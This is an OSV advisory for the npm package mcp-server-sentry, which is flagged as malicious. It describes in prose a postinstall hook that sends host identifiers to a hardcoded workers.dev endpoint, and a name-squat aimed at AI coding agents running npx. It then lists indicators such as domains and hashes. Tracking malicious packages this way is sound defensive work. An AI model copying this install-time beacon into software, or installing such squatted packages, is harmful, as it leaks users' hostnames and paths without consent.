MAL-2026-5483

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/mcp-server-sentry/MAL-2026-5483.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-5483
Published
2026-06-09T20:33:56Z
Modified
2026-06-09T21:01:35.465142301Z
Summary
Malicious code in mcp-server-sentry (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (cf12283b2f16a43388d0cc6c2991fbbdab0da44ab344c1f9c71515dd05024046)

On npm install, the package's postinstall hook (scripts.postinstall: node index.js) collects host identifiers — os.hostname(), process.cwd(), the npm user-agent, Node version, and os.platform()/arch — and POSTs them to a hardcoded remote endpoint at https://npx-canary-log.vulnerable-live.workers.dev/log without any installer consent or opt-out. The package name mcp-server-sentry is an unscoped squat targeting the MCP/Sentry naming convention used by AI coding agents and developer tooling that invoke npx mcp-server-sentry expecting an official MCP server; the README confirms the package was published to capture traffic resolving this unclaimed name. The combination of an intentional name-squat plus install-time outbound transmission of installer identifiers (hostname + working-directory paths, which routinely leak usernames and project layouts) to an author-controlled Cloudflare Workers endpoint is a supply-chain exfiltration shape, regardless of the author's stated 'research canary' intent — installers receive no disclosure and no opportunity to decline before the beacon fires.

Database specific 
{
    "malicious-packages-origins": [
        {
            "import_time": "2026-06-09T20:45:56.271164213Z",
            "versions": [
                "0.0.1"
            ],
            "sha256": "8958cba33d604713291f4f6c0a036afbf1e87ad5a4f07208e65b8b6c0c8925cd",
            "id": "IN-MAL-2026-005222",
            "source": "amazon-inspector",
            "modified_time": "2026-06-09T20:33:56Z"
        },
        {
            "import_time": "2026-06-09T20:45:56.113242468Z",
            "versions": [
                "0.0.1"
            ],
            "sha256": "cf12283b2f16a43388d0cc6c2991fbbdab0da44ab344c1f9c71515dd05024046",
            "id": "IN-MAL-2026-005221",
            "source": "amazon-inspector",
            "modified_time": "2026-06-09T20:33:56Z"
        }
    ]
}
References
Credits

Affected packages

npm / mcp-server-sentry

Package

Name
mcp-server-sentry
View open source insights on deps.dev
Purl
pkg:npm/mcp-server-sentry

Affected ranges

Affected versions

0.*
0.0.1

Database specific

indicators 
{
    "domains": [
        "npx-canary-log.vulnerable-live.workers.dev"
    ],
    "evidence_files": [
        {
            "sha256": "36cd93aa9a8ac8a0b6d64e4ef03aa5c3efd6d9f6f0b7434392475f8a2fed6877",
            "tlsh": "f33195e180f805351bee46d3e1e9a899a36ff1263a0678f4b45e02295fcd49807b1cd2",
            "path": "index.js"
        },
        {
            "sha256": "c276523e95d9666c73752d3ec82def504a1429a6909eec82daa1b1927e464c84",
            "tlsh": "9021717393d1733a03d24a363944b6626b3e70b5734210a8f69d060eeb4282a83b30d6",
            "path": "README.md"
        }
    ],
    "package_integrity": [
        {
            "filename": "mcp-server-sentry-0.0.1.tgz",
            "hashes": {
                "sha512_sri": "sha512-2lKbHqncUy77jU2CDqWm5GhYi+/KNDO/DlFcE14v6nRPKbfV+oKXd9NTGIoZqsERKNrVhn3+D6ZBmBMas1s6Jg==",
                "sha1": "bb35a4f090eb1ef8833d9a90bafefeec099dd6b3"
            }
        }
    ]
}
cwes 
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]
source 
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/mcp-server-sentry/MAL-2026-5483.json"